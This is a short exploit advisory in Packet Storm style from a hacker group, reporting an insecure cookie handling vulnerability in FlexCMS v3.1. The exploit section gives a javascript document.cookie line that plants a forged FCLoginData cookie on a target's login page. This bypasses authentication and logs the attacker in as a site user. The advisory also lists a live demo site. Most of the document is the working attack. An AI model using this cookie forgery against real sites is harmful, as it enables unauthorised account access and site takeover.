FlexCMS Insecure Cookie Handling

2010-02-09T00:00:00
ID PACKETSTORM:86080
Type packetstorm
Reporter ViRuSMaN
Modified 2010-02-09T00:00:00

Description

                                        
                                            `  
  
==============================================================================  
[»] FlexCMS Insecure Cookie Handling Vulnerability  
==============================================================================  
  
[»] Script: [ FlexCMS v3.1 ]  
[»] Language: [ PHP ]  
[»] Site page: [ FlexCMS is a joint venture of DCSun Internet Technologies ]  
[»] Download: [ http://www.flexcms.com/flex/pages/download.html ]  
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]  
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]  
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]  
  
###########################################################################  
  
===[ Exploit ]===  
  
[»] http://[target].com/index.php/login.html  
javascript:document.cookie="FCLoginData12345=demo%3D%3DdevFxxVFdevFxxVFZsuos;path=/";  
demo%3D%3DdevFxxVFdevFxxVFZsuos : username site .  
  
===[ Live Demo ]===  
  
[»] http://www.flexcms3.com/index.php/login.html  
  
  
Author: ViRuSMaN <-  
  
###########################################################################  
________________________________  
Hotmail: Free, trusted and rich email service. Get it now.<https://signup.live.com/signup.aspx?id=60969>  
  
  
  
`